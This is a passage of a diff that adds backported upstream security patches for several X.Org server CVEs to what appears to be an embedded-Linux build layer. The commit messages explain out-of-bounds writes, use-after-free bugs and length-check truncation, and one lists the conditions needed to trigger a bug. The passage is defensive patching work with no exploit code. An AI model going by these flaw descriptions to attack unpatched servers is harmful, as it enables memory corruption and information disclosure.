14temporary grab struct which contains tempGrab->detail.exact = stuff->detail.
15For matching existing grabs, DeleteDetailFromMask is called with the
16stuff->detail value. This function creates a new mask with the one bit
17representing stuff->detail cleared.
18
19However, the array size for the new mask is 8 * sizeof(CARD32) bits,
20thus any detail above 255 results in an OOB array write.
21
22CVE-2022-46341, ZDI-CAN 19381
23
24This vulnerability was discovered by:
25Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
26
27Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
28Acked-by: Olivier Fourdan <ofourdan@redhat.com>
29
30Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/51eb63b0ee1509c6c6b8922b0e4aa037faa6f78b]
31CVE: CVE-2022-46341
32Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
33---
34 Xi/xipassivegrab.c | 22 ++++++++++++++--------
35 1 file changed, 14 insertions(+), 8 deletions(-)
36
37diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
38index d30f51f..89a5910 100644
39--- a/Xi/xipassivegrab.c
40+++ b/Xi/xipassivegrab.c
41@@ -133,6 +133,12 @@ ProcXIPassiveGrabDevice(ClientPtr client)
42 return BadValue;
43 }
44
45+ /* XI2 allows 32-bit keycodes but thanks to XKB we can never
46+ * implement this. Just return an error for all keycodes that
47+ * cannot work anyway, same for buttons > 255. */
48+ if (stuff->detail > 255)
49+ return XIAlreadyGrabbed;
50+
51 if (XICheckInvalidMaskBits(client, (unsigned char *) &stuff[1],
52 stuff->mask_len * 4) != Success)
53 return BadValue;
54@@ -203,14 +209,8 @@ ProcXIPassiveGrabDevice(ClientPtr client)
55 &param, XI2, &mask);
56 break;
57 case XIGrabtypeKeycode:
58- /* XI2 allows 32-bit keycodes but thanks to XKB we can never
59- * implement this. Just return an error for all keycodes that
60- * cannot work anyway */
61- if (stuff->detail > 255)
62- status = XIAlreadyGrabbed;
63- else
64- status = GrabKey(client, dev, mod_dev, stuff->detail,
65- &param, XI2, &mask);
66+ status = GrabKey(client, dev, mod_dev, stuff->detail,
67+ &param, XI2, &mask);
68 break;
69 case XIGrabtypeEnter:
70 case XIGrabtypeFocusIn:
71@@ -319,6 +319,12 @@ ProcXIPassiveUngrabDevice(ClientPtr client)
72 return BadValue;
73 }
74
75+ /* We don't allow passive grabs for details > 255 anyway */
76+ if (stuff->detail > 255) {
77+ client->errorValue = stuff->detail;
78+ return BadValue;
79+ }
80+
81 rc = dixLookupWindow(&win, stuff->grab_window, client, DixSetAttrAccess);
82 if (rc != Success)
83 return rc;
84--
852.25.1
86
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
new file mode 100644
index 0000000000..23fef3f321
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch
@@ -0,0 +1,78 @@
1From b79f32b57cc0c1186b2899bce7cf89f7b325161b Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Wed, 30 Nov 2022 11:20:40 +1000
4Subject: [PATCH] Xext: free the XvRTVideoNotify when turning off from the same
5 client
6
7This fixes a use-after-free bug:
8
9When a client first calls XvdiSelectVideoNotify() on a drawable with a
10TRUE onoff argument, a struct XvVideoNotifyRec is allocated. This struct
11is added twice to the resources:
12 - as the drawable's XvRTVideoNotifyList. This happens only once per
13 drawable, subsequent calls append to this list.
14 - as the client's XvRTVideoNotify. This happens for every client.
15
16The struct keeps the ClientPtr around once it has been added for a
17client. The idea, presumably, is that if the client disconnects we can remove
18all structs from the drawable's list that match the client (by resetting
19the ClientPtr to NULL), but if the drawable is destroyed we can remove
20and free the whole list.
21
22However, if the same client then calls XvdiSelectVideoNotify() on the
23same drawable with a FALSE onoff argument, only the ClientPtr on the
24existing struct was set to NULL. The struct itself remained in the
25client's resources.
26
27If the drawable is now destroyed, the resource system invokes
28XvdiDestroyVideoNotifyList which frees the whole list for this drawable
29- including our struct. This function however does not free the resource
30for the client since our ClientPtr is NULL.
31
32Later, when the client is destroyed and the resource system invokes
33XvdiDestroyVideoNotify, we unconditionally set the ClientPtr to NULL. On
34a struct that has been freed previously. This is generally frowned upon.
35
36Fix this by calling FreeResource() on the second call instead of merely
37setting the ClientPtr to NULL. This removes the struct from the client
38resources (but not from the list), ensuring that it won't be accessed
39again when the client quits.
40
41Note that the assignment tpn->client = NULL; is superfluous since the
42XvdiDestroyVideoNotify function will do this anyway. But it's left for
43clarity and to match a similar invocation in XvdiSelectPortNotify.
44
45CVE-2022-46342, ZDI-CAN 19400
46
47This vulnerability was discovered by:
48Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
49
50Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
51Acked-by: Olivier Fourdan <ofourdan@redhat.com>
52
53Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b79f32b57cc0c1186b2899bce7cf89f7b325161b]
54CVE: CVE-2022-46342
55Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
56---
57 Xext/xvmain.c | 4 +++-
58 1 file changed, 3 insertions(+), 1 deletion(-)
59
60diff --git a/Xext/xvmain.c b/Xext/xvmain.c
61index c520c7d..5f4c174 100644
62--- a/Xext/xvmain.c
63+++ b/Xext/xvmain.c
64@@ -811,8 +811,10 @@ XvdiSelectVideoNotify(ClientPtr client, DrawablePtr pDraw, BOOL onoff)
65 tpn = pn;
66 while (tpn) {
67 if (tpn->client == client) {
68- if (!onoff)
69+ if (!onoff) {
70 tpn->client = NULL;
71+ FreeResource(tpn->id, XvRTVideoNotify);
72+ }
73 return Success;
74 }
75 if (!tpn->client)
76--
772.25.1
78
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
new file mode 100644
index 0000000000..838f7d3726
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch
@@ -0,0 +1,51 @@
1From 842ca3ccef100ce010d1d8f5f6d6cc1915055900 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 29 Nov 2022 14:53:07 +1000
4Subject: [PATCH] Xext: free the screen saver resource when replacing it
5
6This fixes a use-after-free bug:
7
8When a client first calls ScreenSaverSetAttributes(), a struct
9ScreenSaverAttrRec is allocated and added to the client's
10resources.
11
12When the same client calls ScreenSaverSetAttributes() again, a new
13struct ScreenSaverAttrRec is allocated, replacing the old struct. The
14old struct was freed but not removed from the clients resources.
15
16Later, when the client is destroyed the resource system invokes
17ScreenSaverFreeAttr and attempts to clean up the already freed struct.
18
19Fix this by letting the resource system free the old attrs instead.
20
21CVE-2022-46343, ZDI-CAN 19404
22
23This vulnerability was discovered by:
24Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
25
26Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
27Acked-by: Olivier Fourdan <ofourdan@redhat.com>
28
29Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/842ca3ccef100ce010d1d8f5f6d6cc1915055900]
30CVE: CVE-2022-46343
31Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
32---
33 Xext/saver.c | 2 +-
34 1 file changed, 1 insertion(+), 1 deletion(-)
35
36diff --git a/Xext/saver.c b/Xext/saver.c
37index c23907d..05b9ca3 100644
38--- a/Xext/saver.c
39+++ b/Xext/saver.c
40@@ -1051,7 +1051,7 @@ ScreenSaverSetAttributes(ClientPtr client)
41 pVlist++;
42 }
43 if (pPriv->attr)
44- FreeScreenAttr(pPriv->attr);
45+ FreeResource(pPriv->attr->resource, AttrType);
46 pPriv->attr = pAttr;
47 pAttr->resource = FakeClientID(client->index);
48 if (!AddResource(pAttr->resource, AttrType, (void *) pAttr))
49--
502.25.1
51
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
new file mode 100644
index 0000000000..e25afa0d16
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch
@@ -0,0 +1,75 @@
1From 8f454b793e1f13c99872c15f0eed1d7f3b823fe8 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 29 Nov 2022 13:26:57 +1000
4Subject: [PATCH] Xi: avoid integer truncation in length check of
5 ProcXIChangeProperty
6
7This fixes an OOB read and the resulting information disclosure.
8
9Length calculation for the request was clipped to a 32-bit integer. With
10the correct stuff->num_items value the expected request size was
11truncated, passing the REQUEST_FIXED_SIZE check.
12
13The server then proceeded with reading at least stuff->num_items bytes
14(depending on stuff->format) from the request and stuffing whatever it
15finds into the property. In the process it would also allocate at least
16stuff->num_items bytes, i.e. 4GB.
17
18The same bug exists in ProcChangeProperty and ProcXChangeDeviceProperty,
19so let's fix that too.
20
21CVE-2022-46344, ZDI-CAN 19405
22
23This vulnerability was discovered by:
24Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
25
26Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
27Acked-by: Olivier Fourdan <ofourdan@redhat.com>
28
29Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/8f454b793e1f13c99872c15f0eed1d7f3b823fe8]
30CVE: CVE-2022-46344
31Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
32---
33 Xi/xiproperty.c | 4 ++--
34 dix/property.c | 3 ++-
35 2 files changed, 4 insertions(+), 3 deletions(-)
36
37diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
38index 6ec419e..0cfa6e3 100644
39--- a/Xi/xiproperty.c
40+++ b/Xi/xiproperty.c
41@@ -890,7 +890,7 @@ ProcXChangeDeviceProperty(ClientPtr client)
42 REQUEST(xChangeDevicePropertyReq);
43 DeviceIntPtr dev;
44 unsigned long len;
45- int totalSize;
46+ uint64_t totalSize;
47 int rc;
48
49 REQUEST_AT_LEAST_SIZE(xChangeDevicePropertyReq);
50@@ -1128,7 +1128,7 @@ ProcXIChangeProperty(ClientPtr client)
51 {
52 int rc;
53 DeviceIntPtr dev;
54- int totalSize;
55+ uint64_t totalSize;
56 unsigned long len;
57
58 REQUEST(xXIChangePropertyReq);
59diff --git a/dix/property.c b/dix/property.c
60index ff1d669..6fdb74a 100644
61--- a/dix/property.c
62+++ b/dix/property.c
63@@ -205,7 +205,8 @@ ProcChangeProperty(ClientPtr client)
64 WindowPtr pWin;
65 char format, mode;
66 unsigned long len;
67- int sizeInBytes, totalSize, err;
68+ int sizeInBytes, err;
69+ uint64_t totalSize;
70
71 REQUEST(xChangePropertyReq);
72
73--
742.25.1
75
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
new file mode 100644
index 0000000000..ef2ee5d55e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch
@@ -0,0 +1,38 @@
1From 0ba6d8c37071131a49790243cdac55392ecf71ec Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Wed, 25 Jan 2023 11:41:40 +1000
4Subject: [PATCH] Xi: fix potential use-after-free in DeepCopyPointerClasses
5
6CVE-2023-0494, ZDI-CAN-19596
7
8This vulnerability was discovered by:
9Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
10
11Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
12
13Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0ba6d8c37071131a49790243cdac55392ecf71ec]
14CVE: CVE-2023-0494
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 Xi/exevents.c | 4 +++-
18 1 file changed, 3 insertions(+), 1 deletion(-)
19
20diff --git a/Xi/exevents.c b/Xi/exevents.c
21index 217baa9561..dcd4efb3bc 100644
22--- a/Xi/exevents.c
23+++ b/Xi/exevents.c
24@@ -619,8 +619,10 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
25 memcpy(to->button->xkb_acts, from->button->xkb_acts,
26 sizeof(XkbAction));
27 }
28- else
29+ else {
30 free(to->button->xkb_acts);
31+ to->button->xkb_acts = NULL;
32+ }
33
34 memcpy(to->button->labels, from->button->labels,
35 from->button->numButtons * sizeof(Atom));
36--
37GitLab
38
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
new file mode 100644
index 0000000000..51d0e0cab6
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch
@@ -0,0 +1,46 @@
1From 26ef545b3502f61ca722a7a3373507e88ef64110 Mon Sep 17 00:00:00 2001
2From: Olivier Fourdan <ofourdan@redhat.com>
3Date: Mon, 13 Mar 2023 11:08:47 +0100
4Subject: [PATCH] composite: Fix use-after-free of the COW
5
6ZDI-CAN-19866/CVE-2023-1393
7
8If a client explicitly destroys the compositor overlay window (aka COW),
9we would leave a dangling pointer to that window in the CompScreen
10structure, which will trigger a use-after-free later.
11
12Make sure to clear the CompScreen pointer to the COW when the latter gets
13destroyed explicitly by the client.
14
15This vulnerability was discovered by:
16Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
17
18Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
19Reviewed-by: Adam Jackson <ajax@redhat.com>
20
21Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26ef545b3502f61ca722a7a3373507e88ef64110]
22CVE: CVE-2023-1393
23Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
24---
25 composite/compwindow.c | 5 +++++
26 1 file changed, 5 insertions(+)
27
28diff --git a/composite/compwindow.c b/composite/compwindow.c
29index 4e2494b86b..b30da589e9 100644
30--- a/composite/compwindow.c
31+++ b/composite/compwindow.c
32@@ -620,6 +620,11 @@ compDestroyWindow(WindowPtr pWin)
33 ret = (*pScreen->DestroyWindow) (pWin);
34 cs->DestroyWindow = pScreen->DestroyWindow;
35 pScreen->DestroyWindow = compDestroyWindow;
36+
37+ /* Did we just destroy the overlay window? */
38+ if (pWin == cs->pOverlayWin)
39+ cs->pOverlayWin = NULL;
40+
41 /* compCheckTree (pWin->drawable.pScreen); can't check -- tree isn't good*/
42 return ret;
43 }
44--
45GitLab
46
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
new file mode 100644
index 0000000000..508588481e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch
@@ -0,0 +1,84 @@
1From 541ab2ecd41d4d8689e71855d93e492bc554719a Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 3 Oct 2023 11:53:05 +1000
4Subject: [PATCH] Xi/randr: fix handling of PropModeAppend/Prepend
5
6The handling of appending/prepending properties was incorrect, with at
7least two bugs: the property length was set to the length of the new
8part only, i.e. appending or prepending N elements to a property with P
9existing elements always resulted in the property having N elements
10instead of N + P.
11
12Second, when pre-pending a value to a property, the offset for the old
13values was incorrect, leaving the new property with potentially
14uninitalized values and/or resulting in OOB memory writes.
15For example, prepending a 3 element value to a 5 element property would
16result in this 8 value array:
17 [N, N, N, ?, ?, P, P, P ] P, P
18 ^OOB write
19
20The XI2 code is a copy/paste of the RandR code, so the bug exists in
21both.
22
23CVE-2023-5367, ZDI-CAN-22153
24
25This vulnerability was discovered by:
26Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
27
28Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
29
30Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/541ab2ecd41d4d8689e71855d93e492bc554719a]
31CVE: CVE-2023-5367
32Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
33---
34 Xi/xiproperty.c | 4 ++--
35 randr/rrproperty.c | 4 ++--
36 2 files changed, 4 insertions(+), 4 deletions(-)
37
38diff --git a/Xi/xiproperty.c b/Xi/xiproperty.c
39index 066ba21fba..d315f04d0e 100644
40--- a/Xi/xiproperty.c
41+++ b/Xi/xiproperty.c
42@@ -730,7 +730,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
43 XIDestroyDeviceProperty(prop);
44 return BadAlloc;
45 }
46- new_value.size = len;
47+ new_value.size = total_len;
48 new_value.type = type;
49 new_value.format = format;
50
51@@ -747,7 +747,7 @@ XIChangeDeviceProperty(DeviceIntPtr dev, Atom property, Atom type,
52 case PropModePrepend:
53 new_data = new_value.data;
54 old_data = (void *) (((char *) new_value.data) +
55- (prop_value->size * size_in_bytes));
56+ (len * size_in_bytes));
57 break;
58 }
59 if (new_data)
60diff --git a/randr/rrproperty.c b/randr/rrproperty.c
61index c2fb9585c6..25469f57b2 100644
62--- a/randr/rrproperty.c
63+++ b/randr/rrproperty.c
64@@ -209,7 +209,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
65 RRDestroyOutputProperty(prop);
66 return BadAlloc;
67 }
68- new_value.size = len;
69+ new_value.size = total_len;
70 new_value.type = type;
71 new_value.format = format;
72
73@@ -226,7 +226,7 @@ RRChangeOutputProperty(RROutputPtr output, Atom property, Atom type,
74 case PropModePrepend:
75 new_data = new_value.data;
76 old_data = (void *) (((char *) new_value.data) +
77- (prop_value->size * size_in_bytes));
78+ (len * size_in_bytes));
79 break;
80 }
81 if (new_data)
82--
83GitLab
84
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
new file mode 100644
index 0000000000..720340d83b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
1From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Thu, 5 Oct 2023 12:19:45 +1000
4Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
5
6PointerWindows[] keeps a reference to the last window our sprite
7entered - changes are usually handled by CheckMotion().
8
9If we switch between screens via XWarpPointer our
10dev->spriteInfo->sprite->win is set to the new screen's root window.
11If there's another window at the cursor location CheckMotion() will
12trigger the right enter/leave events later. If there is not, it skips
13that process and we never trigger LeaveWindow() - PointerWindows[] for
14the device still refers to the previous window.
15
16If that window is destroyed we have a dangling reference that will
17eventually cause a use-after-free bug when checking the window hierarchy
18later.
19
20To trigger this, we require:
21- two protocol screens
22- XWarpPointer to the other screen's root window
23- XDestroyWindow before entering any other window
24
25This is a niche bug so we hack around it by making sure we reset the
26PointerWindows[] entry so we cannot have a dangling pointer. This
27doesn't handle Enter/Leave events correctly but the previous code didn't
28either.
29
30CVE-2023-5380, ZDI-CAN-21608
31
32This vulnerability was discovered by:
33Sri working with Trend Micro Zero Day Initiative
34
35Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
36Reviewed-by: Adam Jackson <ajax@redhat.com>
37
38Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
39CVE: CVE-2023-5380
40Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
41---
42 dix/enterleave.h | 2 --
43 include/eventstr.h | 3 +++
44 mi/mipointer.c | 17 +++++++++++++++--
45 3 files changed, 18 insertions(+), 4 deletions(-)
46
47diff --git a/dix/enterleave.h b/dix/enterleave.h
48index 4b833d8..e8af924 100644
49--- a/dix/enterleave.h
50+++ b/dix/enterleave.h
51@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
52
53 extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
54
55-extern void LeaveWindow(DeviceIntPtr dev);
56-
57 extern void CoreFocusEvent(DeviceIntPtr kbd,
58 int type, int mode, int detail, WindowPtr pWin);
59
60diff --git a/include/eventstr.h b/include/eventstr.h
61index bf3b95f..2bae3b0 100644
62--- a/include/eventstr.h
63+++ b/include/eventstr.h
64@@ -296,4 +296,7 @@ union _InternalEvent {
65 #endif
66 };
67
68+extern void
69+LeaveWindow(DeviceIntPtr dev);
70+
71 #endif
72diff --git a/mi/mipointer.c b/mi/mipointer.c
73index 75be1ae..b12ae9b 100644
74--- a/mi/mipointer.c
75+++ b/mi/mipointer.c
76@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
77 #ifdef PANORAMIX
78 && noPanoramiXExtension
79 #endif
80- )
81- UpdateSpriteForScreen(pDev, pScreen);
82+ ) {
83+ DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
84+ /* Hack for CVE-2023-5380: if we're moving
85+ * screens PointerWindows[] keeps referring to the
86+ * old window. If that gets destroyed we have a UAF
87+ * bug later. Only happens when jumping from a window
88+ * to the root window on the other screen.
89+ * Enter/Leave events are incorrect for that case but
90+ * too niche to fix.
91+ */
92+ LeaveWindow(pDev);
93+ if (master)
94+ LeaveWindow(master);
95+ UpdateSpriteForScreen(pDev, pScreen);
96+ }
97 }
98
99 /**
100--
1012.25.1
102
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
new file mode 100644
index 0000000000..0abd5914fa
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
1From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Tue, 28 Nov 2023 15:19:04 +1000
4Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
5
6button->xkb_acts is supposed to be an array sufficiently large for all
7our buttons, not just a single XkbActions struct. Allocating
8insufficient memory here means when we memcpy() later in
9XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
10leading to the usual security ooopsiedaisies.
11
12CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
13
14This vulnerability was discovered by:
15Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
16
17Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
18CVE: CVE-2023-6377
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 Xi/exevents.c | 12 ++++++------
22 dix/devices.c | 10 ++++++++++
23 2 files changed, 16 insertions(+), 6 deletions(-)
24
25diff --git a/Xi/exevents.c b/Xi/exevents.c
26index dcd4efb3bc..54ea11a938 100644
27--- a/Xi/exevents.c
28+++ b/Xi/exevents.c
29@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
30 }
31
32 if (from->button->xkb_acts) {
33- if (!to->button->xkb_acts) {
34- to->button->xkb_acts = calloc(1, sizeof(XkbAction));
35- if (!to->button->xkb_acts)
36- FatalError("[Xi] not enough memory for xkb_acts.\n");
37- }
38+ size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
39+ to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
40+ maxbuttons,
41+ sizeof(XkbAction));
42+ memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
43 memcpy(to->button->xkb_acts, from->button->xkb_acts,
44- sizeof(XkbAction));
45+ from->button->numButtons * sizeof(XkbAction));
46 }
47 else {
48 free(to->button->xkb_acts);
49diff --git a/dix/devices.c b/dix/devices.c
50index b063128df0..3f3224d626 100644
51--- a/dix/devices.c
52+++ b/dix/devices.c
53@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
54
55 if (master->button && master->button->numButtons != maxbuttons) {
56 int i;
57+ int last_num_buttons = master->button->numButtons;
58+
59 DeviceChangedEvent event = {
60 .header = ET_Internal,
61 .type = ET_DeviceChanged,
62@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
63 };
64
65 master->button->numButtons = maxbuttons;
66+ if (last_num_buttons < maxbuttons) {
67+ master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
68+ maxbuttons,
69+ sizeof(XkbAction));
70+ memset(&master->button->xkb_acts[last_num_buttons],
71+ 0,
72+ (maxbuttons - last_num_buttons) * sizeof(XkbAction));
73+ }
74
75 memcpy(&event.buttons.names, master->button->labels, maxbuttons *
76 sizeof(Atom));
77--
78GitLab
79
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
new file mode 100644
index 0000000000..6392eae3f8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
1From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Mon, 27 Nov 2023 16:27:49 +1000
4Subject: [PATCH] randr: avoid integer truncation in length check of
5 ProcRRChange*Property
6
7Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
8See also xserver@8f454b79 where this same bug was fixed for the core
9protocol and XI.
10
11This fixes an OOB read and the resulting information disclosure.
12
13Length calculation for the request was clipped to a 32-bit integer. With
14the correct stuff->nUnits value the expected request size was
15truncated, passing the REQUEST_FIXED_SIZE check.
16
17The server then proceeded with reading at least stuff->num_items bytes
18(depending on stuff->format) from the request and stuffing whatever it
19finds into the property. In the process it would also allocate at least
20stuff->nUnits bytes, i.e. 4GB.
21
22CVE-2023-6478, ZDI-CAN-22561
23
24This vulnerability was discovered by:
25Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
26
27Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
28CVE: CVE-2023-6478
29Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
30---
31 randr/rrproperty.c | 2 +-
32 randr/rrproviderproperty.c | 2 +-
33 2 files changed, 2 insertions(+), 2 deletions(-)
34
35diff --git a/randr/rrproperty.c b/randr/rrproperty.c
36index 25469f57b2..c4fef8a1f6 100644
37--- a/randr/rrproperty.c
38+++ b/randr/rrproperty.c
39@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
40 char format, mode;
41 unsigned long len;
42 int sizeInBytes;
43- int totalSize;
44+ uint64_t totalSize;
45 int err;
46
47 REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
48diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
49index b79c17f9bf..90c5a9a933 100644
50--- a/randr/rrproviderproperty.c
51+++ b/randr/rrproviderproperty.c
52@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
53 char format, mode;
54 unsigned long len;
55 int sizeInBytes;
56- int totalSize;
57+ uint64_t totalSize;
58 int err;
59
60 REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
61--
62GitLab
63
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
new file mode 100644
index 0000000000..0bfff268e7
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
1From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Thu, 14 Dec 2023 11:29:49 +1000
4Subject: [PATCH] dix: allocate enough space for logical button maps
5
6Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
7each logical button currently down. Since buttons can be arbitrarily mapped
8to anything up to 255 make sure we have enough bits for the maximum mapping.
9
10CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
11
12This vulnerability was discovered by:
13Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
14
15Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
16CVE: CVE-2023-6816
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 Xi/xiquerypointer.c | 3 +--
20 dix/enterleave.c | 5 +++--
21 2 files changed, 4 insertions(+), 4 deletions(-)
22
23diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
24index 5b77b1a444..2b05ac5f39 100644
25--- a/Xi/xiquerypointer.c
26+++ b/Xi/xiquerypointer.c
27@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
28 if (pDev->button) {
29 int i;
30
31- rep.buttons_len =
32- bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
33+ rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
34 rep.length += rep.buttons_len;
35 buttons = calloc(rep.buttons_len, 4);
36 if (!buttons)
37diff --git a/dix/enterleave.c b/dix/enterleave.c
38index 867ec74363..ded8679d76 100644
39--- a/dix/enterleave.c
40+++ b/dix/enterleave.c
